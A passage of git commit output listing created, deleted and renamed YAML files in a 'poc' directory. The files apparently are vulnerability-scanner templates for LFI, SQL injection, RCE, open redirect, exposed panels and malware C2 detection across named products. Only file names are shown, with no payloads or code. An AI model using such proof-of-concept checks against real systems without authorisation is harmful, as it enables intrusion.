poc/local_file_inclusion/minimouse-lfi-8877.yaml delete mode 100644 poc/local_file_inclusion/moodle-filter-jmol-lfi-8938.yaml delete mode 100644 poc/local_file_inclusion/mpsec-lfi.yaml delete mode 100644 poc/local_file_inclusion/opencti-lfi-9268.yaml delete mode 100644 poc/local_file_inclusion/opensis-lfi.yaml create mode 100644 poc/local_file_inclusion/orbiteam-bscw-server-lfi-9404.yaml rename poc/local_file_inclusion/{pacsone-server-lfi.yaml => pacsone-server-lfi-9428.yaml} (100%) delete mode 100644 poc/local_file_inclusion/pikpikculfi.yaml delete mode 100644 poc/local_file_inclusion/qihang-media-lfi-9769.yaml create mode 100644 poc/local_file_inclusion/qihang-media-lfi.yaml create mode 100644 poc/local_file_inclusion/samsung-wlan-ap-lfi-10000.yaml delete mode 100644 poc/local_file_inclusion/samsung-wlan-ap-lfi-9999.yaml create mode 100644 poc/local_file_inclusion/simple-image-manipulator-lfi-10282.yaml create mode 100644 poc/local_file_inclusion/sl-studio-lfi.yaml create mode 100644 poc/local_file_inclusion/sofneta-mecdream-pacs-lfi.yaml create mode 100644 poc/local_file_inclusion/thinkcmf-lfi-10721.yaml delete mode 100644 poc/local_file_inclusion/thinkcmf-lfi-10723.yaml create mode 100644 poc/local_file_inclusion/video-synchro-pdf-lfi-11007.yaml delete mode 100644 poc/local_file_inclusion/vmware-vcenter-lfi-11047.yaml create mode 100644 poc/local_file_inclusion/vmware-vcenter-lfi.yaml delete mode 100644 poc/local_file_inclusion/wordpress-lfi.yaml create mode 100644 poc/local_file_inclusion/wordpress-wordfence-lfi-11346.yaml delete mode 100644 poc/local_file_inclusion/wordpress-wordfence-lfi-11350.yaml create mode 100644 poc/local_file_inclusion/wp-javospot-lfi-11482.yaml delete mode 100644 poc/local_file_inclusion/wp-javospot-lfi.yaml create mode 100644 poc/local_file_inclusion/wp-memphis-documents-library-lfi-11495.yaml delete mode 100644 poc/local_file_inclusion/wp-simple-fields-lfi-11569.yaml rename poc/local_file_inclusion/{wp-tutor-lfi-11600.yaml => 
wp-tutor-lfi.yaml} (100%) create mode 100644 poc/local_file_inclusion/xerox-efi-lfi.yaml create mode 100644 poc/local_file_inclusion/yishaadmin-lfi.yaml create mode 100644 poc/magento/magento-2-exposed-api-8688.yaml create mode 100644 poc/magento/magento-admin-panel-8690.yaml delete mode 100644 poc/magento/magento-admin-panel-8692.yaml delete mode 100644 poc/magento/magento-cacheleak-8699.yaml delete mode 100644 poc/magento/magento-config-disclosure.yaml rename poc/microsoft/{74cms-sqli-10.yaml => 74cms-sqli.yaml} (100%) rename poc/microsoft/{aims-password-mgmt-client-218.yaml => aims-password-mgmt-client-219.yaml} (100%) create mode 100644 poc/microsoft/aims-password-mgmt-client-221.yaml create mode 100644 poc/microsoft/aims-password-portal-225.yaml delete mode 100644 poc/microsoft/bems-api-lfi-709.yaml delete mode 100644 poc/microsoft/bems-api-lfi-712.yaml delete mode 100644 poc/microsoft/bolt-cms-panel-762.yaml create mode 100644 poc/microsoft/bolt-cms-panel-763.yaml rename poc/microsoft/{call-break-cms-840.yaml => call-break-cms-838.yaml} (100%) delete mode 100644 poc/microsoft/chamilo-lms-sqli-892.yaml create mode 100644 poc/microsoft/chamilo-lms-sqli.yaml create mode 100644 poc/microsoft/cisco-systems-login-973.yaml delete mode 100644 poc/microsoft/cisco-systems-login-975.yaml delete mode 100644 poc/microsoft/craft-cms-detect.yaml create mode 100644 poc/microsoft/dedecms-carbuyaction-fileinclude-6794.yaml rename poc/microsoft/{dedecms-carbuyaction-fileinclude-6792.yaml => dedecms-carbuyaction-fileinclude.yaml} (100%) rename poc/microsoft/{dedecms-membergroup-sqli.yaml => dedecms-membergroup-sqli-6796.yaml} (100%) rename poc/microsoft/{dotcms-admin-panel-7085.yaml => dotcms-admin-panel-7087.yaml} (100%) delete mode 100644 poc/microsoft/dotnetcms-sqli.yaml create mode 100644 poc/microsoft/duomicms-sql-injection-7124.yaml create mode 100644 poc/microsoft/duomicms-sql-injection.yaml rename poc/microsoft/{empirecms-xss.yaml => empirecms-xss-7218.yaml} (100%) 
delete mode 100644 poc/microsoft/empirecms-xss-7220.yaml delete mode 100644 poc/microsoft/ems-login-panel-7223.yaml delete mode 100644 poc/microsoft/feifeicms-lfr.yaml delete mode 100644 poc/microsoft/grav-cms-detect.yaml create mode 100644 poc/microsoft/isams-panel.yaml delete mode 100644 poc/microsoft/jeewms-lfi.yaml delete mode 100644 poc/microsoft/kevinlab-bems-sqli-8457.yaml delete mode 100644 poc/microsoft/kevinlab-hems-backdoor-8467.yaml delete mode 100644 poc/microsoft/lotuscms-rce-8650.yaml create mode 100644 poc/microsoft/lotuscms-rce-8652.yaml delete mode 100644 poc/microsoft/metatag-cms-8833.yaml create mode 100644 poc/microsoft/microsoft-exchange-server-detect-8853.yaml create mode 100644 poc/microsoft/microsoft-exchange-server-detect-8854.yaml delete mode 100644 poc/microsoft/microsoft-exchange-workflow-8855.yaml create mode 100644 poc/microsoft/microsoft-exchange-workflow.yaml delete mode 100644 poc/microsoft/ms-adcs-detect-8960.yaml create mode 100644 poc/microsoft/ms-adcs-detect-8961.yaml create mode 100644 poc/microsoft/msmtp-config-8967.yaml delete mode 100644 poc/microsoft/myucms-lfr-8985.yaml delete mode 100644 poc/microsoft/myucms-lfr-8987.yaml delete mode 100644 poc/microsoft/netlify-cms-9039.yaml create mode 100644 poc/microsoft/netlify-cms-9041.yaml delete mode 100644 poc/microsoft/octobercms-default-login-9192.yaml create mode 100644 poc/microsoft/octobercms-default-login.yaml delete mode 100644 poc/microsoft/octobercms-detect-9195.yaml create mode 100644 poc/microsoft/odoo-cms-redirect-9199.yaml delete mode 100644 poc/microsoft/pandora-fms-console-9451.yaml create mode 100644 poc/microsoft/pandora-fms-console-9453.yaml create mode 100644 poc/microsoft/pbootcms-database-file-download-9469.yaml delete mode 100644 poc/microsoft/plone-cms-detect-9607.yaml rename poc/microsoft/{plone-cms-detect.yaml => plone-cms-detect-9608.yaml} (100%) create mode 100644 poc/microsoft/powercreator-cms-rce-9645.yaml create mode 100644 
poc/microsoft/powercreator-cms-rce.yaml create mode 100644 poc/microsoft/quick-cms-sqli.yaml create mode 100644 poc/microsoft/rhymix-cms-detect-9878.yaml delete mode 100644 poc/microsoft/saferoads-vms-login-9971.yaml create mode 100644 poc/microsoft/saferoads-vms-login-9973.yaml create mode 100644 poc/microsoft/samsung-wlan-ap-lfi-10000.yaml delete mode 100644 poc/microsoft/samsung-wlan-ap-lfi-9999.yaml create mode 100644 poc/microsoft/samsung-wlan-ap-xss-10012.yaml delete mode 100644 poc/microsoft/samsung-wlan-ap-xss.yaml create mode 100644 poc/microsoft/samsung-wlan-default-login-10018.yaml create mode 100644 poc/microsoft/seacms-rce-10101.yaml create mode 100644 poc/microsoft/seacms-sqli-10103.yaml create mode 100644 poc/microsoft/seeddms-detect-10131.yaml delete mode 100644 poc/microsoft/sevone-nms-network-manager.yaml create mode 100644 poc/microsoft/tikiwiki-cms-10773.yaml delete mode 100644 poc/microsoft/tikiwiki-cms-10775.yaml create mode 100644 poc/microsoft/top-xss-params-10807.yaml delete mode 100644 poc/microsoft/top-xss-params-10809.yaml create mode 100644 poc/microsoft/vpms-auth-bypass-11066.yaml delete mode 100644 poc/microsoft/vpms-auth-bypass-11068.yaml rename poc/microsoft/{wems-manager-xss.yaml => wems-manager-xss-11192.yaml} (100%) create mode 100644 poc/microsoft/wondercms-detect-11222.yaml delete mode 100644 poc/microsoft/wondercms-detect.yaml create mode 100644 poc/microsoft/wp-arforms-listing-11415.yaml create mode 100644 poc/microsoft/wp-mstore-plugin-listing-11500.yaml rename poc/microsoft/{wp-sfwd-lms-listing-11562.yaml => wp-sfwd-lms-listing-11564.yaml} (100%) create mode 100644 poc/microsoft/wuzhicms-detect-11654.yaml create mode 100644 poc/microsoft/wuzhicms-detect.yaml delete mode 100644 poc/microsoft/xdcms-sqli-11664.yaml delete mode 100644 poc/microsoft/zcms-v3-sqli-11773.yaml create mode 100644 poc/microsoft/zms-auth-bypass-11830.yaml delete mode 100644 poc/microsoft/zms-auth-bypass-11832.yaml create mode 100644 
poc/mongodb/alibaba-mongoshake-unauth-268.yaml create mode 100644 poc/mongodb/mongodb-detect-8920.yaml delete mode 100644 poc/mongodb/mongodb-unauth-8925.yaml create mode 100644 poc/mongodb/rockmongo-default-login-9897.yaml delete mode 100644 poc/mongodb/rockmongo-xss-9902.yaml create mode 100644 poc/mongodb/unauthenticated-mongo-express.yaml delete mode 100644 poc/netlify/api-netlify-470.yaml create mode 100644 poc/netlify/api-netlify.yaml delete mode 100644 poc/netlify/netlify-cms-9039.yaml create mode 100644 poc/netlify/netlify-cms-9041.yaml create mode 100644 poc/nginx/default-nginx-page-6881.yaml rename poc/nginx/{git-config-nginxoffbyslash-7632.yaml => git-config-nginxoffbyslash-7628.yaml} (100%) create mode 100644 poc/nginx/git-config-nginxoffbyslash-7630.yaml rename poc/nginx/{nginx-config.yaml => nginx-config-9099.yaml} (100%) delete mode 100644 poc/nginx/nginx-linux-page-9102.yaml delete mode 100644 poc/nginx/nginx-linux-page.yaml delete mode 100644 poc/nginx/nginx-version-9122.yaml create mode 100644 poc/nginx/nginx-version-9123.yaml delete mode 100644 poc/nodejs/kube-api-nodes-8508.yaml delete mode 100644 poc/nodejs/kube-api-nodes.yaml delete mode 100644 poc/nodejs/lfr_express.yaml create mode 100644 poc/nodejs/node-ecstatic-listing.yaml create mode 100644 poc/nodejs/node-integration-enabled-9136.yaml delete mode 100644 poc/nodejs/node-integration-enabled-9137.yaml delete mode 100644 poc/nodejs/puppet-node-manager-detect-9720.yaml create mode 100644 poc/nodejs/puppet-node-manager-detect.yaml create mode 100644 poc/nodejs/unauthenticated-mongo-express.yaml create mode 100644 poc/nodejs/unauthorized-puppet-node-manager-detect-10958.yaml delete mode 100644 poc/nodejs/unauthorized-puppet-node-manager-detect-10959.yaml delete mode 100644 poc/open_redirect/age-gate-open-redirect-207.yaml create mode 100644 poc/open_redirect/age-gate-open-redirect.yaml delete mode 100644 poc/open_redirect/attitude-theme-open-redirect.yaml create mode 100644 
poc/open_redirect/aws-redirect-651.yaml delete mode 100644 poc/open_redirect/brandfolder-open-redirect-779.yaml create mode 100644 poc/open_redirect/eatery-restaurant-open-redirect-7158.yaml delete mode 100644 poc/open_redirect/eatery-restaurant-open-redirect.yaml delete mode 100644 poc/open_redirect/homeautomation-v3-openredirect-7985.yaml delete mode 100644 poc/open_redirect/httpbin-open-redirect.yaml create mode 100644 poc/open_redirect/music-store-open-redirect.yaml delete mode 100644 poc/open_redirect/newsletter-open-redirect.yaml create mode 100644 poc/open_redirect/odoo-cms-redirect-9199.yaml delete mode 100644 poc/open_redirect/office365-open-redirect-9215.yaml delete mode 100644 poc/open_redirect/otobo-open-redirect-9409.yaml delete mode 100644 poc/open_redirect/pieregister-plugin-open-redirect.yaml create mode 100644 poc/open_redirect/pollbot-redirect-9622.yaml delete mode 100644 poc/open_redirect/sap-redirect.yaml delete mode 100644 poc/open_redirect/ultimatemember-open-redirect-10877.yaml delete mode 100644 poc/open_redirect/weekender-newspaper-open-redirect.yaml delete mode 100644 poc/open_redirect/wordpress-redirection-plugin-listing-11306.yaml rename poc/open_redirect/{wordpress-redirection-plugin-listing.yaml => wordpress-redirection-plugin-listing-11308.yaml} (100%) create mode 100644 poc/open_redirect/wp-grimag-open-redirect-11458.yaml rename poc/open_redirect/{wp-gtranslate-open-redirect.yaml => wp-gtranslate-open-redirect-11463.yaml} (100%) delete mode 100644 poc/open_redirect/wp-gtranslate-open-redirect-11465.yaml delete mode 100644 poc/open_redirect/wp-prostore-open-redirect-11546.yaml create mode 100644 poc/open_redirect/wp-prostore-open-redirect-11550.yaml create mode 100644 poc/open_redirect/wptouch-open-redirect-11592.yaml create mode 100644 poc/oracle/metadata-oracle-8829.yaml delete mode 100644 poc/oracle/metadata-oracle.yaml delete mode 100644 poc/oracle/oracle-business-control-9347.yaml delete mode 100644 
poc/oracle/oracle-dbass-detect-9351.yaml delete mode 100644 poc/oracle/oracle-dbass-detect.yaml delete mode 100644 poc/oracle/oracle-ebs-sqllog-disclosure-9369.yaml create mode 100644 poc/oracle/oracle-ebs-xss-9373.yaml delete mode 100644 poc/oracle/oracle-ebs-xss-9376.yaml create mode 100644 poc/oracle/oracle-http-server-12c-9384.yaml delete mode 100644 poc/oracle/oracle-integrated-manager-9386.yaml create mode 100644 poc/oracle/oracle-iplanet-web-server-9392.yaml delete mode 100644 poc/oracle/oracle-iplanet-web-server.yaml create mode 100644 poc/oracle/oracle-opera-login.yaml delete mode 100644 poc/oracle/oracle-people-enterprise-9394.yaml create mode 100644 poc/other/LayerSlider-plugin.yaml delete mode 100644 poc/other/X-Remote-IP.yaml create mode 100644 poc/other/acenet-panel.yaml delete mode 100644 poc/other/activemq-panel-49.yaml create mode 100644 poc/other/activemq-panel-53.yaml rename poc/other/{acunetix-panel.yaml => acunetix-panel-56.yaml} (100%) rename poc/other/{acunetix-panel-54.yaml => acunetix-panel-58.yaml} (100%) delete mode 100644 poc/other/adminer-panel-74.yaml create mode 100644 poc/other/adminer-panel-77.yaml create mode 100644 poc/other/adminset-panel-79.yaml delete mode 100644 poc/other/adminset-panel-80.yaml create mode 100644 poc/other/advance-setup-119.yaml delete mode 100644 poc/other/akamai-cloudtest-253.yaml delete mode 100644 poc/other/alibaba-canal-info-leak-266.yaml create mode 100644 poc/other/alienvault-usm-271.yaml delete mode 100644 poc/other/ampps-admin-panel-305.yaml create mode 100644 poc/other/ampps-admin-panel-306.yaml rename poc/other/{ampps-dirlisting.yaml => ampps-dirlisting-307.yaml} (100%) create mode 100644 poc/other/ampps-panel-310.yaml create mode 100644 poc/other/ansible-semaphore-panel.yaml delete mode 100644 poc/other/antsword-backdoor-333.yaml create mode 100644 poc/other/antsword-backdoor.yaml delete mode 100644 poc/other/artifactory-anonymous-deploy-549.yaml create mode 100644 
poc/other/aspose-file-download-558.yaml delete mode 100644 poc/other/aspose-pdf-file-download.yaml create mode 100644 poc/other/aspose-words-file-download-571.yaml create mode 100644 poc/other/audiobookshelf-panel.yaml delete mode 100644 poc/other/automation-direct-597.yaml delete mode 100644 poc/other/axis-happyaxis-670.yaml create mode 100644 poc/other/axis-happyaxis.yaml rename poc/other/{barracuda-panel-685.yaml => barracuda-panel.yaml} (100%) rename poc/other/{basic-dns-example.yaml => basic.yaml} (100%) create mode 100644 poc/other/beyondtrust-panel-720.yaml delete mode 100644 poc/other/bigip.yaml create mode 100644 poc/other/bitrix-panel-748.yaml delete mode 100644 poc/other/bitrix-panel-750.yaml rename poc/other/{bookstack-panel-767.yaml => bookstack-panel-766.yaml} (100%) delete mode 100644 poc/other/buddy-panel-797.yaml create mode 100644 poc/other/buddy-panel.yml rename poc/other/{cacti-panel-829.yaml => cacti-panel-828.yaml} (100%) create mode 100644 poc/other/cacti-weathermap-file-write-832.yaml delete mode 100644 poc/other/cacti-weathermap-file-write-833.yaml delete mode 100644 poc/other/campaignmonitor-841.yaml create mode 100644 poc/other/campaignmonitor-842.yaml create mode 100644 poc/other/can-i-take-over-dns-852.yaml delete mode 100644 poc/other/cerebro-panel-878.yaml create mode 100644 poc/other/cerebro-panel-881.yaml delete mode 100644 poc/other/certificate-validation-882.yaml create mode 100644 poc/other/certificate-validation-884.yaml create mode 100644 poc/other/cgi-printenv.yaml rename poc/other/{cgi-test-page-888.yaml => cgi-test-page-887.yaml} (100%) delete mode 100644 poc/other/checkpoint-panel-898.yaml create mode 100644 poc/other/circarlife-setup-918.yaml delete mode 100644 poc/other/circarlife-setup-920.yaml create mode 100644 poc/other/citrix-oob-memory-read.yaml rename poc/other/{clearpass-policy-manager-997.yaml => clearpass-policy-manager-1001.yaml} (100%) rename poc/other/{clientaccesspolicy-1007.yaml => 
clientaccesspolicy-1005.yaml} (100%) delete mode 100644 poc/other/cofense-vision-panel-1141.yaml create mode 100644 poc/other/cofense-vision-panel-1142.yaml delete mode 100644 poc/other/contact-form-7.yaml create mode 100644 poc/other/crossdomain-xml-1267.yaml create mode 100644 poc/other/csod-panel-1286.yaml create mode 100644 poc/other/custom_nuclei-3.yaml create mode 100644 poc/other/d-link-arbitary-fileread-7043.yaml delete mode 100644 poc/other/d-link-arbitary-fileread-7044.yaml delete mode 100644 poc/other/d-link-wireless-7047.yaml delete mode 100644 poc/other/dead-host-with-cname-6786.yaml create mode 100644 poc/other/deimos-c2.yaml delete mode 100644 poc/other/development-logs-6989.yaml rename poc/other/{diaowen-fileread(1).yaml => diaowen-fileread.yaml} (100%) create mode 100644 poc/other/dir-listing-7003.yaml create mode 100644 poc/other/dlink-850l-info-leak-7035.yaml create mode 100644 poc/other/dlink-850l-info-leak-7039.yaml mode change 100755 => 100644 poc/other/dlink-file-read.yaml delete mode 100644 poc/other/dokuwiki-panel.yaml create mode 100644 poc/other/drone-ci-panel-7091.yaml create mode 100644 poc/other/druid-monitor-7102.yaml delete mode 100644 poc/other/druid-monitor-7103.yaml create mode 100644 poc/other/ds-store-file.yaml create mode 100644 poc/other/dss-download-fileread.yaml delete mode 100644 poc/other/dxplanning-panel.yaml rename poc/other/{dynamic-broadcast-receiver-7140.yaml => dynamic-broadcast-receiver-7141.yaml} (100%) create mode 100644 poc/other/easy-media-gallery-pro-listing-7152.yaml rename poc/other/{Bitrix_check_env.yaml => env.yaml} (100%) delete mode 100644 poc/other/envision-gateway.yaml create mode 100644 poc/other/error-logs-7255.yaml create mode 100644 poc/other/f-secure-policy-manager-7560.yaml rename poc/other/{fatpipe-ipvpn-panel-7436.yaml => fatpipe-ipvpn-panel-7435.yaml} (100%) rename poc/other/{file-scheme-7468.yaml => file-scheme-7467.yaml} (100%) create mode 100644 poc/other/filezilla-7470.yaml create mode 
100644 poc/other/formula.yaml delete mode 100644 poc/other/fortinet-fortigate-panel-7536.yaml delete mode 100644 poc/other/foulenzer-subdomain-tk (copy 1).yaml delete mode 100644 poc/other/gespage-panel-7605.yaml create mode 100644 poc/other/gespage-panel-7606.yaml delete mode 100644 poc/other/globalprotect-panel-7720.yaml delete mode 100644 poc/other/glpi-directory-listing-7734.yaml create mode 100644 poc/other/glpi-directory-listing.yaml delete mode 100644 poc/other/glpidirectorylisting(1).yaml create mode 100644 poc/other/gogs-workflow-7760.yaml delete mode 100644 poc/other/gogs-workflow.yaml create mode 100644 poc/other/goodjob-dashboard.yaml delete mode 100644 poc/other/h2console-panel-7866.yaml delete mode 100644 poc/other/hack5-cloud-c2.yaml create mode 100644 poc/other/haivision-gateway-panel.yaml delete mode 100644 poc/other/hanming-lfr.yaml rename poc/other/{harbor-workflow-7889.yaml => harbor-workflow.yaml} (100%) delete mode 100644 poc/other/heatmiser-wifi-thermostat.yaml delete mode 100644 poc/other/hikvision-info-leak-7958.yaml create mode 100644 poc/other/hikvision-info-leak.yaml create mode 100644 poc/other/hitron-technologies-7961.yaml delete mode 100644 poc/other/hitron-technologies-7962.yaml delete mode 100644 poc/other/hjtcloud-arbitrary-file-read-7967.yaml rename poc/other/{hjtcloud-rest-arbitrary-file-read-7973.yaml => hjtcloud-rest-arbitrary-file-read.yaml} (100%) delete mode 100644 poc/other/hmc-hybris-panel-7977.yaml create mode 100644 poc/other/hmc-hybris-panel-7978.yaml create mode 100644 poc/other/honeywell-building-control-7987.yaml delete mode 100644 poc/other/honeywell-building-control-7988.yaml rename poc/other/{hp-ilo-5-8021.yaml => hp-ilo-5-8018.yaml} (100%) create mode 100644 poc/other/hp-ilo-5-8020.yaml delete mode 100644 poc/other/hp-service-manager-8032.yaml create mode 100644 poc/other/hp-service-manager-8034.yaml delete mode 100644 poc/other/hpe-system-management-anonymous-8013.yaml delete mode 100644 
poc/other/huawei-hg532e-panel-8066.yaml create mode 100644 poc/other/huijietong-cloud-fileread.yaml delete mode 100644 poc/other/identity-services-engine-8146.yaml delete mode 100644 poc/other/identityguard-selfservice-entrust-8142.yaml delete mode 100644 poc/other/immich-panel.yaml delete mode 100644 poc/other/interactsh-server-8165.yaml create mode 100644 poc/other/interactsh-server.yaml create mode 100644 poc/other/internet-service-8178.yaml delete mode 100644 poc/other/internet-service.yaml rename poc/other/{ioncube-loader-wizard-8184.yaml => ioncube-loader-wizard.yaml} (100%) rename poc/other/{itop-panel-8204.yaml => itop-panel-8205.yaml} (100%) delete mode 100644 poc/other/jamf-panel-8216.yaml delete mode 100644 poc/other/jfrog-8306.yaml delete mode 100644 poc/other/jkstatus-manager-8344.yaml create mode 100644 poc/other/jmx-console-8351.yaml delete mode 100644 poc/other/jmx-console-8352.yaml rename poc/other/{jolokia-8367.yaml => jolokia-8369.yaml} (100%) delete mode 100644 poc/other/jolokia-list-8360.yaml create mode 100644 poc/other/jolokia-list-8361.yaml create mode 100644 poc/other/kingsoft-v8-file-read.yaml create mode 100644 poc/other/kubelet-healthz.yaml create mode 100644 poc/other/kubelet-pods-8523.yaml rename poc/other/{landray-oa-fileread-8570.yaml => landray-oa-fileread-8571.yaml} (100%) create mode 100644 poc/other/liveview-axis-camera-8648.yaml delete mode 100644 poc/other/lockself-panel.yaml delete mode 100644 poc/other/lotus-domino-version-8657.yaml create mode 100644 poc/other/lotus-domino-version.yaml rename poc/other/{lucee-stack-trace-8669.yaml => lucee-stack-trace-8668.yaml} (100%) create mode 100644 poc/other/manageengine-adaudit-8730.yaml delete mode 100644 poc/other/manageengine-apex-helpdesk-8746.yaml create mode 100644 poc/other/manageengine-apex-helpdesk-8748.yaml delete mode 100644 poc/other/manageengine-applications-manager-8751.yaml create mode 100644 poc/other/manageengine-applications-manager-8753.yaml delete mode 100644 
poc/other/manageengine-assetexplorer-8758.yaml delete mode 100644 poc/other/manageengine-desktop-8763.yaml create mode 100644 poc/other/manageengine-opmanager-8767.yaml delete mode 100644 poc/other/manageengine-opmanager-8768.yaml rename poc/other/{manageengine-servicedesk-8772.yaml => manageengine-servicedesk-8771.yaml} (100%) delete mode 100644 poc/other/manageengine-supportcenter-8777.yaml rename poc/other/{get.yaml => match-1.yaml} (100%) rename poc/other/{matcher-with-or.yaml => matcher-with-and.yaml} (100%) delete mode 100644 poc/other/meduza-stealer.yaml create mode 100644 poc/other/metadata-alibaba-8807.yaml delete mode 100644 poc/other/metadata-azure-8813.yaml create mode 100644 poc/other/metadata-azure.yaml create mode 100644 poc/other/metadata-hetzner-8822.yaml mode change 100644 => 100755 poc/other/metadata-service-alibaba.yaml delete mode 100644 poc/other/mikrotik-graph-8870.yaml create mode 100644 poc/other/mikrotik-graph-8871.yaml create mode 100644 poc/other/mini-start-page-8895.yaml delete mode 100644 poc/other/mini-start-page-8896.yaml create mode 100644 poc/other/mobileiron-sentry.yaml delete mode 100644 poc/other/mobotix-guest-camera-8910.yaml create mode 100644 poc/other/moodle-workplace-panel.yaml create mode 100644 poc/other/mx-fingerprint.yaml create mode 100644 poc/other/mystic-stealer.yaml create mode 100644 poc/other/nameserver-fingerprint.yaml delete mode 100644 poc/other/navicat-server-panel.yaml rename poc/other/{nessus-panel-9020.yaml => nessus-panel-9017.yaml} (100%) create mode 100644 poc/other/netis-info-leak.yaml delete mode 100644 poc/other/netscaler-gateway-9052.yaml create mode 100644 poc/other/nextcloud-install-9084.yaml delete mode 100644 poc/other/nextcloud-install-9085.yaml create mode 100644 poc/other/nexus-panel.yaml delete mode 100644 poc/other/nh-c2.yaml delete mode 100644 poc/other/ns-asg-file-read-9153.yaml delete mode 100644 poc/other/ns-asg-file-read.yaml create mode 100644 poc/other/oki-data-9223.yaml delete mode 
100644 poc/other/oki-data-9226.yaml create mode 100644 poc/other/okiko-sfiler-portal-9227.yaml rename poc/other/{okta-panel-9231.yaml => okta-panel-9234.yaml} (100%) delete mode 100644 poc/other/old-copyright-9237.yaml create mode 100644 poc/other/oob-param-based-interaction-9252.yaml delete mode 100644 poc/other/oob-param-based-interaction.yaml delete mode 100644 poc/other/open-mjpg-streamer-9284.yaml delete mode 100644 poc/other/open-proxy-internal-9289.yaml create mode 100644 poc/other/open-proxy-internal-9290.yaml create mode 100644 poc/other/open-proxy-portscan-9295.yaml create mode 100644 poc/other/open-virtualization-manager-panel-9328.yaml create mode 100644 poc/other/openam-workflow.yaml create mode 100644 poc/other/opensis-workflow-9318.yaml rename poc/other/{opensis-workflow-9319.yaml => opensis-workflow.yaml} (100%) delete mode 100644 poc/other/opentouch-multimediaservices-panel.yaml create mode 100644 poc/other/overseerr-panel.yaml delete mode 100644 poc/other/pacs-connexion-utilisateur-9425.yaml create mode 100644 poc/other/pagespeed-global-admin-9433.yaml delete mode 100644 poc/other/pagespeed-global-admin-9435.yaml delete mode 100644 poc/other/pahtool-panel.yaml create mode 100644 poc/other/panabit-panel-9444.yaml delete mode 100644 poc/other/panabit-panel-9445.yaml delete mode 100644 poc/other/panasonic-network-management-9447.yaml create mode 100644 poc/other/panasonic-network-management-9448.yaml create mode 100644 poc/other/passbolt-panel.yaml create mode 100644 poc/other/pdi-device-page.yaml rename poc/other/{pentaho-panel-9483.yaml => pentaho-panel-9481.yaml} (100%) create mode 100644 poc/other/plausible-panel.yaml delete mode 100644 poc/other/plesk-obsidian-9594.yaml rename poc/other/{plesk-onyx-9598.yaml => plesk-onyx-9601.yaml} (100%) delete mode 100644 poc/other/plesk-stat-9604.yaml create mode 100644 poc/other/plesk-stat.yaml create mode 100644 poc/other/plugin.yaml rename poc/other/{portainer-init-deploy-9630.yaml => 
portainer-init-deploy.yaml} (100%) delete mode 100644 poc/other/posteio-admin-panel.yaml delete mode 100644 poc/other/postmessage-outgoing-tracker-9634.yaml create mode 100644 poc/other/postmessage-outgoing-tracker.yaml delete mode 100644 poc/other/powerlogic-ion-9648.yaml create mode 100644 poc/other/powerlogic-ion-9650.yaml rename poc/other/{prometheus-exporter-9678.yaml => prometheus-exporter-9677.yaml} (100%) create mode 100644 poc/other/prometheus-exporter.yaml create mode 100644 poc/other/prometheus-flags-9687.yaml delete mode 100644 poc/other/prometheus-flags.yaml delete mode 100644 poc/other/prometheus-targets-9691.yaml create mode 100644 poc/other/prototype-pollution-check-9698.yaml delete mode 100644 poc/other/prototype-pollution-check-9699.yaml rename poc/other/{provider-path-9702.yaml => provider-path-9701.yaml} (100%) create mode 100644 poc/other/ptr-fingerprint.yaml create mode 100644 poc/other/pulse-secure-panel-9712.yaml rename poc/other/{put-m-enb.yaml => put-method-enabled-9727.yaml} (100%) delete mode 100644 poc/other/put-method-enabled.yaml create mode 100644 poc/other/pypicloud-panel-9733.yaml create mode 100644 poc/other/qdpm-info-leak-9753.yaml create mode 100644 poc/other/qdpm-info-leak.yaml rename poc/other/{race-multiple.yaml => race-simple.yaml} (100%) create mode 100644 poc/other/radius-manager-9794.yaml delete mode 100644 poc/other/radius-manager-9796.yaml rename poc/other/{get-override-sni.yaml => raw-get.yaml} (100%) create mode 100644 poc/other/red-lion-panel.yaml create mode 100644 poc/other/request-based-interaction-9862.yaml rename poc/other/{request-based-interaction-9863.yaml => request-based-interaction.yaml} (100%) delete mode 100644 poc/other/resin-inputfile-fileread-9868.yaml create mode 100644 poc/other/resin-inputfile-fileread-9870.yaml create mode 100644 poc/other/resin-viewfile-lfr.yaml create mode 100644 poc/other/robots-txt-9888.yaml delete mode 100644 poc/other/robots-txt-9890.yaml create mode 100644 
poc/other/ruijie-eg-filedown.yaml rename poc/other/{scs-landfill-control-10098.yaml => scs-landfill-control-10097.yaml} (100%) delete mode 100644 poc/other/securenvoy-panel-10114.yaml create mode 100644 poc/other/securenvoy-panel-10116.yaml delete mode 100644 poc/other/securepoint-utm-10117.yaml create mode 100644 poc/other/securepoint-utm-10118.yaml delete mode 100644 poc/other/security-10123.yaml create mode 100644 poc/other/security-10124.yaml delete mode 100644 poc/other/selea-ip-camera-10136.yaml create mode 100644 poc/other/selfcheck-panel.yaml delete mode 100644 poc/other/server-status-localhost-10165.yaml create mode 100644 poc/other/server-status-localhost-10166.yaml rename poc/other/{shell-history-10193.yaml => shell-history.yaml} (100%) delete mode 100644 poc/other/sidekiq-dashboard-10235.yaml create mode 100644 poc/other/sidekiq-dashboard-10239.yaml create mode 100644 poc/other/signatures-10268.yaml delete mode 100644 poc/other/sitemap.yaml rename poc/other/{skycaiji-admin-panel-10304.yaml => skycaiji-admin-panel-10306.yaml} (100%) delete mode 100644 poc/other/softether-vpn-panel.yaml create mode 100644 poc/other/solarwinds-orion-10357.yaml delete mode 100644 poc/other/solarwinds-orion-10359.yaml create mode 100644 poc/other/solr-fileread.yaml create mode 100644 poc/other/solr-query-dashboard-10368.yaml delete mode 100644 poc/other/solr-query-dashboard.yaml rename poc/other/{sonarqube-public-projects-10379.yaml => sonarqube-public-projects-10377.yaml} (100%) rename poc/other/{sonicwall-sslvpn-panel-10390.yaml => sonicwall-sslvpn-panel-10388.yaml} (100%) create mode 100644 poc/other/sonicwall-sslvpn-shellshock-10395.yaml create mode 100644 poc/other/sphinxonline-panel.yaml delete mode 100644 poc/other/spidercontrol-scada-server-info-10413.yaml delete mode 100644 poc/other/splunk-enterprise-panel-10415.yaml create mode 100644 poc/other/spoofable-spf-records-ptr-10424.yaml delete mode 100644 poc/other/spoofable-spf-records-ptr-10425.yaml delete mode 100644 
